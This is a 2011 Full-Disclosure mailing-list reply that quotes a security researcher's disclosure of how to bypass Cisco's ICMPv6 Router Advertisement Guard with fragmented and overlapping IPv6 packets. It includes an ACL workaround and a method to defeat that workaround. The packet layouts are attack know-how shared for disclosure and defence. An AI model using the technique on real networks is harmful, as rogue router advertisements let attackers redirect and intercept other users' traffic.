[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20110523090708.GI24792@ernw.de>
Date: Mon, 23 May 2011 11:07:08 +0200
From: Enno Rey <erey@...w.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Bypassing Cisco's ICMPv6 Router Advertisement
Guard feature
Hi,
some Wireshark excerpts on the attack Marc describes below can be found here:
http://www.insinuator.net/2011/05/yet-another-update-on-ipv6-security-some-notes-from-the-ipv6-kongress-in-frankfurt/
thanks
Enno
On Mon, May 23, 2011 at 10:49:05AM +0200, Marc Heuse wrote:
>
> To bypass the Router Advertisement Guarding feature in the (very few)
> Cisco switches (and images) that support it:
>
> Attack:
> =======
> Make the evil Router Advertisement fragmented and put the ICMPv6 into
> the second fragment, eg. by putting a very large Destination extension
> header before the ICMPv6 part.
>
> So the packets look like:
>
> Fragment 1:
> IPv6 Header
> Fragmentation Header
> Destination Header (~1400 bytes)
>
> Fragment 2:
> IPv6 Header
> Fragmentation Header
> Destination Header (continued with some bytes)
> ICMPv6 with RA
>
>
> Workaround:
> ===========
> To prevent this attack, put the following IPv6 ACL on all ports:
>
> deny ip any any undetermined-transport
>
> This will drop all packets where the switch is not able to identify the
> IPv6 transport type like in this attack. Note that this might drop some
> unusual valid traffic too.
>
>
> Workaround Bypass:
> ==================
> Craft the packets in a way so that the first fragment has an ICMPv6 echo
> request and the second fragment overwrites the first fragment with the
> ICMPv6 router advertisement.
>
> Fragment 1:
> IPv6 Header
> Fragmentation Header
> Destination Header (8 bytes)
> ICMPv6 with Echo Request
>
> Fragment 2:
> IPv6 Header
> Fragmentation Header with offset == 1 (equals position of 8th byte ==
> start of Echo Request in first fragment)
> ICMPv6 with RA
>
> Note that the handling of overlapping fragments differs between
> platforms, some take the first fragment received, others the latest, so
> send the packets accordingly to your target.
>
>
> Hackers win again. Sorry Cisco.
> Have fun with IPv6!
>
> Greets,
> Marc
>
> P.S. Cisco is informed, they "accept the risk" ...
> P.P.S. thc-ipv6 v1.6 was released 10 days ago :-)
>
> --
> Marc Heuse
> www.mh-sec.de
>
> Ust.-Ident.-Nr.: DE244222388
> PGP: FEDD 5B50 C087 F8DF 5CB9 876F 7FDD E533 BF4F 891A
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
Enno Rey
ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 174 3082474
PGP FP 055F B3F3 FE9D 71DD C0D5 444E C611 033E 3296 1CC1
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
=======================================================
Blog: www.insinuator.net || Conference: www.troopers.de
=======================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists